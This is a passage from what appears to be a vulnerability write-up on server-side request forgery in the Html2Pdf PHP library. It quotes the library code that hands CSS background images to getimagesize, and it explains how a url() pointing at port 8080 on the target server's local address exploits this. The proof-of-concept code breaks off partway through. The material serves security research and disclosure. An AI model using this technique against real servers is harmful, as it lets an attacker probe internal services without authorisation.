class Html2Pdf { … protected function _drawRectangle($x, $y, $w, $h, $border, $padding, $margin, $background) { … // prepare the background image if ($background[‘image’]) { $iName = $background[‘image’]; // marker 1 … // get the size of the image // WARNING : if URL, “allow_url_fopen” must turned to “on” in php.ini $imageInfos=@getimagesize($iName); // marker 2 … } … }
“`

Starting the web application on port 8080 on the target server

##### Exploitation

To exploit this vulnerability, we will demonstrate the source code of the web application that contains the `div` tag with the `style` attribute. In the CSS, the `background` property will be set using the `url()` function. This function takes a value that contains the local address of the target server on port 8080.

Web application source code

“`
<?php require __DIR__ . '/vendor/autoload.php'; use SpipuHtml2PdfHtml2Pdf; $content = '

Hello World

Recent posts